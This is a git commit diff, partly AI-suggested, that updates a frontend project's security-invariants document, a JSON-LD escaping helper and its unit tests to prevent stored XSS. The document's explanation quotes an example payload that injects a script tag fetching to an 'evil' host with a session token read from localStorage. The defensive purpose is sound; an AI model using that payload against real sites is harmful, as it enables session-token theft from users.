Apply suggestions from code review

longsizhuo · Copilot · web-flow · commit 3e9285e4df96 · 2026-05-08T10:13:09.000+08:00
Co-authored-by: Copilot Autofix powered by AI &lt;175728472+Copilot@users.noreply.github.com&gt;
diff --git a/docs/SECURITY_INVARIANTS.md b/docs/SECURITY_INVARIANTS.md
@@ -1,7 +1,7 @@
 # 前端安全不变量（Security Invariants）
 
 > 这是给维护者看的代码不变量清单。
-> 公开的 vulnerability disclosure policy 见 `frontend/SECURITY.md`。
+> 公开的 vulnerability disclosure policy 见 `SECURITY.md`。
 
 本文档登记前端代码中**不可变更的安全保护点**。
 每条不变量都对应一段 lint / 测试 / 代码模式，CI 应能捕获回归。
@@ -35,9 +35,9 @@
   - 暂时通过 grep 巡查兜底：
     `rg -t tsx -t ts 'dangerouslySetInnerHTML' app/ | grep -v safeJsonLdString | grep "application/ld\\+json"`
     应返回 0 行。建议未来加 ESLint 自定义规则。
-  - 推荐补一个单元测试：
-    `safeJsonLdString({bio: "</script><script>x</script>"})`
-    输出不能包含字面 `</script>`，必须含 `</script>`。
+  - 现有单元测试见：`tests/json-ld.test.ts`
+    例如 `safeJsonLdString({bio: "</script><script>x</script>"})`
+    输出不能包含字面 `<` 或 `</script>`，并且应包含转义后的 `\\u003c` 序列。
 - **为什么**：`JSON.stringify` 默认不转义 `<` `>` `&`，攻击者把
   `</script><script>fetch("https://evil/?t="+localStorage.getItem("satoken"))</script>`
   写进任何 user-generated 字段（profile bio、displayName 等）即触发 stored XSS。
diff --git a/lib/json-ld.ts b/lib/json-ld.ts
@@ -1,7 +1,7 @@
 /**
  * 把任意对象序列化为可安全嵌入 <script type="application/ld+json"> 的字符串。
  *
- * 安全不变量 INV-FE-001（见 frontend/SECURITY.md）：
+ * 安全不变量 INV-FE-001（见 SECURITY.md）：
  * 所有 dangerouslySetInnerHTML={{__html: JSON.stringify(jsonLd)}} 必须改用本函数。
  *
  * 攻击场景：用户在可控字段（bio / displayName 等 user-generated 字段）填入
@@ -17,7 +17,15 @@
  * ECMAScript 源码上下文会被识别为行终止符破坏外层 JS 语法——defense-in-depth。
  */
 export function safeJsonLdString(payload: unknown): string {
-  return JSON.stringify(payload)
+  let serialized: string | undefined;
+
+  try {
+    serialized = JSON.stringify(payload);
+  } catch {
+    serialized = "null";
+  }
+
+  return (serialized ?? "null")
     .replace(/</g, "\\u003c")
     .replace(/>/g, "\\u003e")
     .replace(/&/g, "\\u0026")
diff --git a/tests/json-ld.test.ts b/tests/json-ld.test.ts
@@ -7,7 +7,7 @@
  *
  * JSON.stringify 默认输出原文，浏览器看到 `</script>` 就闭合 script block，
  * 接着把后续 `<script>` 当 inline JS 执行——典型 stored XSS。
- * safeJsonLdString 把所有 `<` 转成字面 6 字符 `<`，浏览器看不到 `<`。
+ * safeJsonLdString 把所有 `<` 转成字面 6 字符 `\u003c`，浏览器看不到原始 `<`。
  */
 import { describe, expect, test } from "vitest";
 import { safeJsonLdString } from "../lib/json-ld";
@@ -37,7 +37,7 @@ describe("safeJsonLdString", () => {
     const out = safeJsonLdString({ field: "a<b>c&d" });
     expect(out).not.toContain("<");
     expect(out).not.toContain(">");
-    // & 也应该被转义为 &
+    // & 也应该被转义为字面 `\\u0026`
     expect(out).toContain("\\u0026");
   });
 
